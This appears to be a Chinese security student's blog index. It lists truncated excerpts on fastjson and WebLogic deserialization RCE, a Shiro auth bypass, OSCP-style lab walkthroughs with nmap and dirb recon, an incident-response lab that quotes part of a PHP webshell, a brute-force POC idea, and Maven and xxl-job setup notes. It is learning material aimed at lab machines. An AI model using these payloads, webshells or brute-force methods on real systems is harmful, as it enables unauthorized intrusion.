vulhub-fastjson
fastjson原理:https://blog.csdn.net/Bossfrank/article/details/130100893+
https://www.freebuf.com/vuls/208339.html
RMi:https://blog.csdn.net/cj_eryue/article/details/134283846
靶机:192.168.174.137
攻击机:192.168.174.160
1.2.24-rce访问靶机8090端口,查看服务
可以看到成功访问
1.远程创建文件在攻击机上创建一个TouchFile.java文件
// javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process;public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = ...
ip练习-python
# encoding='utf-8'"""https://blog.51cto.com/u_16213398/9007087https://docs.python.org/zh-cn/3/howto/ipaddress.html#ipaddress-howtohttps://blog.csdn.net/u013541325/article/details/117530957https://www.cnblogs.com/itsfei/p/17445303.htmlhttps://mwell.tech/archives/9630#:~:text=%E4%BD%BF%E7%94%A8%20ipaddress%20%E6%A8%A1%E5%9D%97%E5%A4%84%E7%90%86%20IP%20%E7%BD%91%E7%BB%9C%201%201.%20%E6%A3%80%E6%9F%A5IP%E5%9C%B0%E5%9D%80%E6%98%AFIPv4%E8%BF%98%E6%98%AFIPv6,true%E3%80%82%20... ...
vulnhub-shiro
超级详细:https://xz.aliyun.com/t/11633#toc-2 # 好文
什么是ShiroApache Shiro 是Java 的一个安全框架。Shiro 可以非常容易的开发出足够好的应用,其不仅可以用在JavaSE 环境,也可以用在JavaEE 环境。Shiro 可以帮助我们完成:认证、授权、加密、会话管理、与Web 集成、缓存等。
CVE-2010-3863:权限绕过Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
在Apache Shiro 1.1.0以前的版本中,shiro 进行权限验证前未对url 做标准化处理,攻击者可以构造/、//、/./、/../ 等绕过权限验证
参考链接:
https://github.com/apache/shiro/commit/ab8294940a19743583d91f0c7e29b405d197cc34
https://xz.aliyun.com/t/11633#toc-2 # 好文
https://cve.mitre.org/cgi-b ...
xxl-job
xxl-job安装使用在使用之前,需要把maven配置好,可以看我上一篇关于配置maven的文章,配置完成后可以看这篇教程
使用教程:https://blog.csdn.net/f2315895270/article/details/104714692
我也会跟着操作一遍
编译项目mvn compile
创建数据库直接用doc下的sql文件即可
打开xxl-job-admin模块,在application.properties中进行后台的配置
注意在数据库地址哪里加上时区属性,否则乱码
启动项目然后我们启动XxlJobAdminApplication类,访问http://localhost:8080/xxl-job-admin 默认账户admn,密码123456
成功启动了
参考文章中说定位到springboot模块下的jobhandler层下面,但我下载的更新后的项目,里面已经不再是jobhandler,可以看项目给的SampleXxlJob改,但代码能力不行,我还是找新教程把
换成了这个,我后续跟的是另一个教程java定时任务框架xxl-job(使用、总结),按 ...
Maven环境配置
maven配置环境变量的配置:https://blog.csdn.net/u012660464/article/details/114113349
下载mavenhttps://maven.apache.org/download.cgi
Maven软件的安装Maven 下载后,将 Maven 解压到一个没有中文没有空格的路径下,比如D:\extools\apache-maven-3.9.8下面。 解压D:\extools\apache-maven-3.9.8后目录结构如下:
bin:存放了 maven 的命令
boot:存放了一些 maven 本身的引导程序,如类加载器等
conf:存放了 maven 的一些配置文件,如 setting.xml 文件
lib:存放了 maven 本身运行所需的一些 jar 包
环境变量配置1.配置 MAVEN_HOME ,变量值就是你的 maven 安装的路径(bin 目录之前一级目录)
2.将MAVEN_HOME 添加到Path系统变量
Maven 软件版本测试mvn -v
Maven 仓库
Maven的仓库分类本地仓库: 位于自己计 ...
应急响应靶场-zgsf-web1
参考:https://blog.csdn.net/qq_61872115/article/details/136618102
前景需要:小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,这是他的服务器系统,请你找出以下内容,并作为通关条件:
1.攻击者的shell密码2.攻击者的IP地址3.攻击者的隐藏账户名称4.攻击者挖矿程序的矿池域名
用户:administrator密码Zgsf@admin.com
webshell查杀登陆主机,启动小皮
访问网站
找到网站根目录,直接查杀一下是否存在后门文件,我这里用的是D盾
查看文件内容,不是这个。。。用火绒把,也没有
我说呢,被windows defender给隔离了
打开看看
<?php@error_reporting(0);session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值 ...
OSCP-005-Broken
Broken Gallery主机发现netdiscover -r 192.168.174.0/24
获得目标ip:192.168.174.176
端口,服务扫描nmap -A -p- 192.168.174.176
得到22和80端口开放
下面还有另一种方法,首先通过namp生成扫描结果的文件
nmap -sT -p- --min-rate 1000 192.168.174.167 -oA ./Broken_galley
生成报告后,用awk去找,算是练习把
cat Broken_galley.nmap | grep "open" | awk -F '/' '{print $1}' | paste -sd ',' 返回22,80
nmap -sT -sC -sV -p 22,80 192.168.174.176 -oA ./detail
这种带目录的扫描比较好看
访问服务
有一些图片,和一个readme文件,下载下来是一串16进制的字节码
通过xxd还原成二进制文件
xx ...
OSCP-004-Matrix
OSCP-004-Matrix调整为nat模式
主机发现netdiscover -r 192.168.174.0/24
端口扫描nmap -p- -T5 192.168.174.161
nmap -p80,6464,7331 -sV --script "default, safe" (IP)
可以获得的信息80和7331都是python起的http服务
6464是一个ssh的端口
访问服务80端口
7331端口:一个登陆界面
输入admin:admin后,有个显示,传入后台应该是base64
echo "YWRtaW46YWRtaW4=" | base64 -d
admin:admin
目录扫描dirb http://192.168.174.161
访问该目录
可以在img里找到一个rabbit的图片
下载下来试试
wget http://192.168.174.161/assets/img/Matrix_can-show-you-the-door.png
官方文档是
strings xx.pngzsteg -a xx. ...
weblogic
Weblogic简要介绍https://blog.csdn.net/rumil/article/details/133036788
https://www.freebuf.com/articles/web/372568.html
Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击(开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权限。)
T3协议缺陷实现了Java虚拟机的远程方法调用(RMI),能够 ...
简易爆破poc
POC学习 POC测试,即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。 今天,王哥演示了一下一个爆破脚本编写,也就是写了个poc来验证是复测弱口令漏洞
这里对上课学的东西做一下复盘,写一个结合自己理解的POC,可以参考很多例子,但还是写一个自己思路的把
https://cloud.tencent.com/developer/article/1759225
基于pikachu弱口令爆破的脚本 在用xray扫pikachu靶场时,我们会遇到暴力破解的漏洞,这时候我们可以写一个简单的爆破脚本来测试,虽然burp很好用,但写一个poc练习一下也挺好的,写一下需求思维导图,流程图
爆破,顾名思义,简单粗暴,对账号,密码用字典一个一个匹配测试,思路比较简单,但实际情况很复杂,有验证码,流量限制等。我们需要考虑这些问题。下面给出一个需求的思维导图。
需求要 ...